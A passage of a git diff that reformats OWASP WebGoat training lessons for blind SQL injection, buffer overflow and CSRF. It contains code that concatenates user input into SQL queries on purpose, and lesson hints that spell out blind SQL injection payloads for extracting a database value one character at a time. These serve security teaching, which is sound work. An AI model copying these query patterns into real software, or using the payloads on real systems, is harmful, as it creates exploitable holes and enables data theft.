distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * - * @author Chuck Willis Chuck's web - * site (this lesson is heavily based on Bruce Mayhews' SQL - * Injection lesson + * @author Chuck Willis Chuck's web site (this lesson + * is heavily based on Bruce Mayhews' SQL Injection lesson * @created January 14, 2005 */ public class BlindSqlInjection extends LessonAdapter { - private final static String ACCT_NUM = "account_number"; + private final static String ACCT_NUM = "account_number"; - private final static int TARGET_ACCT_NUM = 15613; + private final static int TARGET_ACCT_NUM = 15613; - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - Connection connection = DatabaseUtilities.getConnection(s); + ElementContainer ec = new ElementContainer(); - ec.addElement(new P().addElement("Enter your Account Number: ")); - - String accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101"); - Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString()); - ec.addElement(input); - - Element b = ECSFactory.makeButton("Go!"); - ec.addElement(b); - - String query = "SELECT * FROM user_data WHERE userid = " + 
accountNumber; - String answer_query; - if (runningOnWindows()) - { - answer_query = "SELECT TOP 1 first_name FROM user_data WHERE userid = " - + TARGET_ACCT_NUM; - } else - { - answer_query = "SELECT first_name FROM user_data WHERE userid = " + TARGET_ACCT_NUM; - } - - try - { - Statement answer_statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(answer_query); - answer_results.first(); - System.out.println("Account: " + accountNumber ); - System.out.println("Answer : " + answer_results.getString(1)); - if (accountNumber.toString().equals(answer_results.getString(1))) + try { - makeSuccess(s); - } else + Connection connection = DatabaseUtilities.getConnection(s); + + ec.addElement(new P().addElement("Enter your Account Number: ")); + + String accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101"); + Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString()); + ec.addElement(input); + + Element b = ECSFactory.makeButton("Go!"); + ec.addElement(b); + + String query = "SELECT * FROM user_data WHERE userid = " + accountNumber; + String answer_query; + if (runningOnWindows()) + { + answer_query = "SELECT TOP 1 first_name FROM user_data WHERE userid = " + TARGET_ACCT_NUM; + } + else + { + answer_query = "SELECT first_name FROM user_data WHERE userid = " + TARGET_ACCT_NUM; + } + + try + { + Statement answer_statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(answer_query); + answer_results.first(); + System.out.println("Account: " + accountNumber); + System.out.println("Answer : " + answer_results.getString(1)); + if (accountNumber.toString().equals(answer_results.getString(1))) + { + makeSuccess(s); + } + else + { + + Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + 
ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery(query); + + if ((results != null) && (results.first() == true)) + { + ec.addElement(new P().addElement("Account number is valid")); + } + else + { + ec.addElement(new P().addElement("Invalid account number")); + } + } + } catch (SQLException sqle) + { + ec.addElement(new P().addElement("An error occurred, please try again.")); + } + } catch (Exception e) { - - Statement statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery(query); - - if ((results != null) && (results.first() == true)) - { - ec.addElement(new P().addElement("Account number is valid")); - } else - { - ec.addElement(new P().addElement("Invalid account number")); - } + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); } - } - catch (SQLException sqle) - { - ec.addElement(new P().addElement("An error occurred, please try again.")); - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + + return (ec); } - return (ec); - } - - /** - * Gets the category attribute of the SqlInjection object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.INJECTION; - } - - /** - * Gets the credits attribute of the AbstractLesson object - * - * @return The credits value - */ - public Element getCredits() - { - return new StringElement("By Chuck Willis"); - } - - /** - * - * Determines the OS that WebGoat is running on. 
Needed because different DB - * backends are used on the different OSes (Access on Windows, InstantDB on - * others) - * - * @return true if running on Windows, false otherwise - */ - private boolean runningOnWindows() - { - String os = System.getProperty("os.name", "Windows"); - if (os.toLowerCase().indexOf("window") != -1) + /** + * Gets the category attribute of the SqlInjection object + * + * @return The category value + */ + protected Category getDefaultCategory() { - return true; - } else - { - return false; + return Category.INJECTION; } - } - /** - * Gets the hints attribute of the DatabaseFieldScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - if (runningOnWindows()) + /** + * Gets the credits attribute of the AbstractLesson object + * + * @return The credits value + */ + public Element getCredits() { - hints - .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " - + "Create a SQL statement that you can use as a true/false test and then " - + "select the first character of the target element and do a start narrowing " - + "down the character using > and <" - + "

The backend database is Microsoft Access. Keep that in mind if you research SQL functions " - + "on the Internet since different databases use some different functions and syntax."); - hints.add("This is the code for the query being built and issued by WebGoat:

" - + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber "); - hints - .add("The application is taking your input and inserting it at the end of a pre-formed SQL command. " - + "You will need to make use of the following SQL functions: " - + "

SELECT - query for your target data and get a string " - + "

mid(string, start, length) - returns a " - + "substring of string starting at the start character and going for length characters " - + "

asc(string) will return the ascii value of the first character in string " - + "

> and < - once you have a character's value, compare it to a choosen one"); - hints - .add("Example: is the first character of the first_name of userid " - + TARGET_ACCT_NUM - + " less than 'M' (ascii 77)? " - + "

101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=" - + TARGET_ACCT_NUM - + ") , 1 , 1) ) < 77 ); " - + "

If you get back that account number is valid, then yes. If get back that the number is" - + "invalid then answer is no."); - hints - .add("Another example: is the second character of the first_name of userid " - + TARGET_ACCT_NUM - + " greater than 'm' (ascii 109)? " - + "

101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=" - + TARGET_ACCT_NUM - + ") , 2 , 1) ) > 109 ); " - + "

If you get back that account number is valid, then yes. If get back that the number is " - + "invalid then answer is no."); - } else - { - hints - .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " - + "Create a SQL statement that you can use as a true/false test and then " - + "select the first character of the target element and do a start narrowing " - + "down the character using > and <"); - - hints - .add("The database backend is InstantDB. Here is a reference guide : http://www.instantdb.com/doc/syntax.html"); - hints.add("This is the code for the query being built and issued by WebGoat:

" - + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber "); - hints - .add("THIS HINT IS FOR THE MS ACCESS DB. IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND.

The application is taking your input and inserting it at the end of a pre-formed SQL command. " - + "You will need to make use of the following SQL functions: " - + "

SELECT - query for your target data and get a string " - + "

mid(string, start, length) - returns a " - + "substring of string starting at the start character and going for length characters " - + "

asc(string) will return the ascii value of the first character in string " - + "

> and < - once you have a character's value, compare it to a choosen one"); - hints - .add("THIS HINT IS FOR THE MS ACCESS DB. IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND.

Example: is the first character of the first_name of userid " - + TARGET_ACCT_NUM - + " less than 'M' (ascii 77)? " - + "

101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=" - + TARGET_ACCT_NUM - + ") , 1 , 1) ) < 77 ); " - + "

If you get back that account number is valid, then yes. If get back that the number is" - + "invalid then answer is no."); - hints - .add("THIS HINT IS FOR THE MS ACCESS DB. IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND.

example: is the second character of the first_name of userid " - + TARGET_ACCT_NUM - + " greater than 'm' (ascii 109)? " - + "

101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=" - + TARGET_ACCT_NUM - + ") , 2 , 1) ) > 109 ); " - + "

If you get back that account number is valid, then yes. If get back that the number is " - + "invalid then answer is no."); + return new StringElement("By Chuck Willis"); } - return hints; - } - /** - * Gets the instructions attribute of the SqlInjection object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = "The form below allows a user to enter an account number and determine if " - + "it is valid or not. Use this form to develop a true / false test check other entries in the database. " - + "

Reference Ascii Values: 'A' = 65 'Z' = 90 'a' = 97 'z' = 122 " - + "

The goal is to find the value of " - + "the first_name in table user_data for userid " - + TARGET_ACCT_NUM - + ". Put the discovered name in the form to pass the lesson. Only the discovered name " - + "should be put into the form field, paying close attention to the spelling and capitalization."; - - return (instructions); - } - - private final static Integer DEFAULT_RANKING = new Integer(70); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the DatabaseFieldScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Blind SQL Injection"); - } - - /** - * Constructor for the DatabaseFieldScreen object - * - * @param s - * Description of the Parameter - */ - public void handleRequest(WebSession s) - { - try + /** + * + * Determines the OS that WebGoat is running on. Needed because different DB backends are used + * on the different OSes (Access on Windows, InstantDB on others) + * + * @return true if running on Windows, false otherwise + */ + private boolean runningOnWindows() { - super.handleRequest(s); + String os = System.getProperty("os.name", "Windows"); + if (os.toLowerCase().indexOf("window") != -1) + { + return true; + } + else + { + return false; + } } - catch (Exception e) + + /** + * Gets the hints attribute of the DatabaseFieldScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) { - System.out.println("Exception caught: " + e); - e.printStackTrace(System.out); + List hints = new ArrayList(); + if (runningOnWindows()) + { + hints + .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " + + "Create a SQL statement that you can use as a true/false test and then " + + "select the first character of the target element and do a start narrowing " + + "down the character using > and <" + + "

The backend database is Microsoft Access. Keep that in mind if you research SQL functions " + + "on the Internet since different databases use some different functions and syntax."); + hints.add("This is the code for the query being built and issued by WebGoat:

" + + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber "); + hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command. " + + "You will need to make use of the following SQL functions: " + + "

SELECT - query for your target data and get a string " + + "

mid(string, start, length) - returns a " + + "substring of string starting at the start character and going for length characters " + + "

asc(string) will return the ascii value of the first character in string " + + "

> and < - once you have a character's value, compare it to a choosen one"); + hints.add("Example: is the first character of the first_name of userid " + TARGET_ACCT_NUM + + " less than 'M' (ascii 77)? " + + "

101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM + + ") , 1 , 1) ) < 77 ); " + + "

If you get back that account number is valid, then yes. If get back that the number is" + + "invalid then answer is no."); + hints + .add("Another example: is the second character of the first_name of userid " + + TARGET_ACCT_NUM + + " greater than 'm' (ascii 109)? " + + "

101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=" + + TARGET_ACCT_NUM + + ") , 2 , 1) ) > 109 ); " + + "

If you get back that account number is valid, then yes. If get back that the number is " + + "invalid then answer is no."); + } + else + { + hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " + + "Create a SQL statement that you can use as a true/false test and then " + + "select the first character of the target element and do a start narrowing " + + "down the character using > and <"); + + hints + .add("The database backend is InstantDB. Here is a reference guide : http://www.instantdb.com/doc/syntax.html"); + hints.add("This is the code for the query being built and issued by WebGoat:

" + + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber "); + hints + .add("THIS HINT IS FOR THE MS ACCESS DB. IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND.

The application is taking your input and inserting it at the end of a pre-formed SQL command. " + + "You will need to make use of the following SQL functions: " + + "

SELECT - query for your target data and get a string " + + "

mid(string, start, length) - returns a " + + "substring of string starting at the start character and going for length characters " + + "

asc(string) will return the ascii value of the first character in string " + + "

> and < - once you have a character's value, compare it to a choosen one"); + hints + .add("THIS HINT IS FOR THE MS ACCESS DB. IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND.

Example: is the first character of the first_name of userid " + + TARGET_ACCT_NUM + + " less than 'M' (ascii 77)? " + + "

101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=" + + TARGET_ACCT_NUM + + ") , 1 , 1) ) < 77 ); " + + "

If you get back that account number is valid, then yes. If get back that the number is" + + "invalid then answer is no."); + hints + .add("THIS HINT IS FOR THE MS ACCESS DB. IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND.

example: is the second character of the first_name of userid " + + TARGET_ACCT_NUM + + " greater than 'm' (ascii 109)? " + + "

101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=" + + TARGET_ACCT_NUM + + ") , 2 , 1) ) > 109 ); " + + "

If you get back that account number is valid, then yes. If get back that the number is " + + "invalid then answer is no."); + } + return hints; + } + + /** + * Gets the instructions attribute of the SqlInjection object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = "The form below allows a user to enter an account number and determine if " + + "it is valid or not. Use this form to develop a true / false test check other entries in the database. " + + "

Reference Ascii Values: 'A' = 65 'Z' = 90 'a' = 97 'z' = 122 " + + "

The goal is to find the value of " + "the first_name in table user_data for userid "
+ + TARGET_ACCT_NUM
+ + ". Put the discovered name in the form to pass the lesson. Only the discovered name "
+ + "should be put into the form field, paying close attention to the spelling and capitalization.";
+
+ return (instructions);
+ }
+
+ private final static Integer DEFAULT_RANKING = new Integer(70);
+
+ protected Integer getDefaultRanking()
+ {
+ return DEFAULT_RANKING;
+ }
+
+ /**
+ * Gets the title attribute of the DatabaseFieldScreen object
+ *
+ * @return The title value
+ */
+ public String getTitle()
+ {
+ return ("Blind SQL Injection");
+ }
+
+ /**
+ * Constructor for the DatabaseFieldScreen object
+ *
+ * @param s
+ * Description of the Parameter
+ */
+ public void handleRequest(WebSession s)
+ {
+ try
+ {
+ super.handleRequest(s);
+ } catch (Exception e)
+ {
+ System.out.println("Exception caught: " + e);
+ e.printStackTrace(System.out);
+ }
 }
- }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java
index e99c9b428..8266e8855 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BufferOverflow.java
@@ -1,110 +1,103 @@
+
 package org.owasp.webgoat.lessons;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.StringElement;
-
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
- * @author Bruce Mayhew WebGoat
- * @created October 28, 2003
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created October 28, 2003
 */
 public class BufferOverflow extends LessonAdapter {
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- // just to get the generic how to text.
- return super.createContent(s);
- }
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element createContent(WebSession s)
+ {
+ // just to get the generic how to text.
+ return super.createContent(s);
+ }
+ /**
+ * Gets the category attribute of the ForgotPassword object
+ *
+ * @return The category value
+ */
+ protected Category getDefaultCategory()
+ {
- /**
- * Gets the category attribute of the ForgotPassword object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
+ return Category.BUFFER_OVERFLOW;
+ }
- return Category.BUFFER_OVERFLOW;
- }
+ /**
+ * Gets the hints attribute of the HelloScreen object
+ *
+ * @return The hints value
+ */
+ public List getHints(WebSession s)
+ {
+ List hints = new ArrayList();
+ hints.add("Lesson Hint 1");
+ hints.add("Lesson Hint 2");
+ return hints;
+ }
- /**
- * Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
- public List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Lesson Hint 1");
- hints.add("Lesson Hint 2");
+ private final static Integer DEFAULT_RANKING = new Integer(15);
- return hints;
- }
+ protected Integer getDefaultRanking()
+ {
+ return DEFAULT_RANKING;
+ }
- private final static Integer DEFAULT_RANKING = new Integer(15);
+ /**
+ * Gets the title attribute of the HelloScreen object
+ *
+ * @return The title value
+ */
+ public String getTitle()
+ {
+ return ("Buffer Overflow");
+ }
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Buffer Overflow");
- }
-
-
- public Element getCredits()
- {
- return new StringElement(
- "This screen created by: Your name could go here");
- }
+ public Element getCredits()
+ {
+ return new StringElement("This screen created by: Your name could go here");
+ }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java
index 55e977602..dbfd7ecfe 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CSRF.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 import java.sql.Connection;
@@ -6,7 +7,6 @@ import java.sql.ResultSet;
 import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -24,39 +24,40 @@ import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
-/*******************************************************************************
+
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
 *
- * @author Sherif Koussa Macadamian Technologies.
-
+ * @author Sherif Koussa Macadamian Technologies.
+ *
 */
-public class CSRF extends LessonAdapter {
+public class CSRF extends LessonAdapter
+{
 private final static String MESSAGE = "message";
 private final static int MESSAGE_COL = 3;
@@ -66,248 +67,257 @@ public class CSRF extends LessonAdapter {
 private final static String TITLE = "title";
 private final static int TITLE_COL = 2;
 private static int count = 1;
- private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted message
- private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
- "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
-
+ private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted
+ // message
+ private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+ .setBorder(0).setHspace(0).setVspace(0);
+
 /**
- * Adds a feature to the Message attribute of the MessageBoardScreen object
- *
- * @param s The feature to be added to the Message attribute
+ * Adds a feature to the Message attribute of the MessageBoardScreen object
+ *
+ * @param s
+ * The feature to be added to the Message attribute
 */
- protected void addMessage( WebSession s )
+ protected void addMessage(WebSession s)
 {
 try
 {
- String title = HtmlEncoder.encode( s.getParser().getRawParameter( TITLE, "" ) );
- String message = s.getParser().getRawParameter( MESSAGE, "" );
+ String title = HtmlEncoder.encode(s.getParser().getRawParameter(TITLE, ""));
+ String message = s.getParser().getRawParameter(MESSAGE, "");
- Connection connection = DatabaseUtilities.getConnection( s );
+ Connection connection = DatabaseUtilities.getConnection(s);
 String query = "INSERT INTO messages VALUES (?, ?, ?, ? 
)";
- PreparedStatement statement = connection.prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+ PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
 statement.setInt(1, count++);
 statement.setString(2, title);
 statement.setString(3, message);
 statement.setString(4, s.getUserName());
- statement.executeUpdate();
-
- }
- catch ( Exception e )
+ statement.execute();
+
+ } catch (Exception e)
 {
- s.setMessage( "Could not add message to database" );
+ s.setMessage("Could not add message to database");
 }
 }
-
+
 @Override
- protected Element createContent(WebSession s) {
+ protected Element createContent(WebSession s)
+ {
 ElementContainer ec = new ElementContainer();
-
- addMessage( s );
- ec.addElement( makeInput( s ) );
- ec.addElement( new HR() );
- ec.addElement( makeCurrent( s ) );
- ec.addElement( new HR() );
- ec.addElement( makeList( s ) );
-
+
+ addMessage(s);
+ ec.addElement(makeInput(s));
+ ec.addElement(new HR());
+ ec.addElement(makeCurrent(s));
+ ec.addElement(new HR());
+ ec.addElement(makeList(s));
+
 return ec;
 }
 /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
 */
- protected Element makeInput( WebSession s )
+ protected Element makeInput(WebSession s)
 {
- Table t = new Table( 0 ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
+ Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
 TR row1 = new TR();
 TR row2 = new TR();
- row1.addElement( new TD( new StringElement( "Title: " ) ) );
+ row1.addElement(new TD(new StringElement("Title: ")));
- Input inputTitle = new Input( Input.TEXT, TITLE, "" );
- row1.addElement( new TD( inputTitle ) );
+ Input inputTitle = new Input(Input.TEXT, TITLE, "");
+ row1.addElement(new 
TD(inputTitle));
 TD item1 = new TD();
- item1.setVAlign( "TOP" );
- item1.addElement( new StringElement( "Message: " ) );
- row2.addElement( item1 );
+ item1.setVAlign("TOP");
+ item1.addElement(new StringElement("Message: "));
+ row2.addElement(item1);
 TD item2 = new TD();
- TextArea ta = new TextArea( MESSAGE, 5, 60 );
- item2.addElement( ta );
- row2.addElement( item2 );
- t.addElement( row1 );
- t.addElement( row2 );
+ TextArea ta = new TextArea(MESSAGE, 5, 60);
+ item2.addElement(ta);
+ row2.addElement(item2);
+ t.addElement(row1);
+ t.addElement(row2);
- Element b = ECSFactory.makeButton( "Submit" );
+ Element b = ECSFactory.makeButton("Submit");
 ElementContainer ec = new ElementContainer();
- ec.addElement( t );
- ec.addElement( new P().addElement( b ) );
+ ec.addElement(t);
+ ec.addElement(new P().addElement(b));
- return ( ec );
+ return (ec);
 }
 /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
 */
- public Element makeList( WebSession s )
+ public Element makeList(WebSession s)
 {
- Table t = new Table( 0 ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
+ Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
 try
 {
- Connection connection = DatabaseUtilities.getConnection( s );
+ Connection connection = DatabaseUtilities.getConnection(s);
- Statement statement = connection.createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
-
- ResultSet results = statement.executeQuery( STANDARD_QUERY + " WHERE user_name LIKE '" + getNameroot( s.getUserName() ) + "%'" );
+ Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
- if ( ( results != null ) && ( results.first() == true ) )
+ ResultSet results = statement.executeQuery(STANDARD_QUERY + " WHERE user_name 
LIKE '"
+ + getNameroot(s.getUserName()) + "%'");
+
+ if ((results != null) && (results.first() == true))
 {
 results.beforeFirst();
- for ( int i = 0; results.next(); i++ )
+ for (int i = 0; results.next(); i++)
 {
- String link = "" + results.getString( TITLE_COL ) + "";
- TD td = new TD().addElement( link );
- TR tr = new TR().addElement( td );
- t.addElement( tr );
+ String link = "" + results.getString(TITLE_COL) + "";
+ TD td = new TD().addElement(link);
+ TR tr = new TR().addElement(td);
+ t.addElement(tr);
 }
 }
- }
- catch ( Exception e )
+ } catch (Exception e)
 {
- s.setMessage( "Error while getting message list." );
+ s.setMessage("Error while getting message list.");
 }
 ElementContainer ec = new ElementContainer();
- ec.addElement( new H1( "Message List" ) );
- ec.addElement( t );
- String transferFunds = s.getParser().getRawParameter("transferFunds" , "");
+ ec.addElement(new H1("Message List"));
+ ec.addElement(t);
+ String transferFunds = s.getParser().getRawParameter("transferFunds", "");
 if (transferFunds.length() != 0)
 {
 makeSuccess(s);
 }
-
- return ( ec );
+ return (ec);
 }
 /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
 */
- protected Element makeCurrent( WebSession s )
+ protected Element makeCurrent(WebSession s)
 {
 ElementContainer ec = new ElementContainer();
 try
 {
- int messageNum = s.getParser().getIntParameter( NUMBER, 0 );
+ int messageNum = s.getParser().getIntParameter(NUMBER, 0);
+
+ Connection connection = DatabaseUtilities.getConnection(s);
- Connection connection = DatabaseUtilities.getConnection( s );
-
 String query = "SELECT * FROM messages WHERE user_name LIKE ? 
and num = ?";
- PreparedStatement statement = connection.prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
- statement.setString(1, getNameroot( s.getUserName() ) + "%");
+ PreparedStatement statement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
+ statement.setString(1, getNameroot(s.getUserName()) + "%");
 statement.setInt(2, messageNum);
 ResultSet results = statement.executeQuery();
- if ( ( results != null ) && results.first() )
+ if ((results != null) && results.first())
 {
- ec.addElement( new H1( "Message Contents For: " + results.getString( TITLE_COL )) );
- Table t = new Table( 0 ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
- TR row1 = new TR( new TD( new B(new StringElement( "Title:" )) ) );
- row1.addElement( new TD( new StringElement( results.getString( TITLE_COL ) ) ) );
- t.addElement( row1 );
+ ec.addElement(new H1("Message Contents For: " + results.getString(TITLE_COL)));
+ Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+ TR row1 = new TR(new TD(new B(new StringElement("Title:"))));
+ row1.addElement(new TD(new StringElement(results.getString(TITLE_COL))));
+ t.addElement(row1);
+
+ String messageData = results.getString(MESSAGE_COL);
+ TR row2 = new TR(new TD(new B(new StringElement("Message:"))));
+ row2.addElement(new TD(new StringElement(messageData)));
+ t.addElement(row2);
+
+ TR row3 = new TR(new TD(new StringElement("Posted By:")));
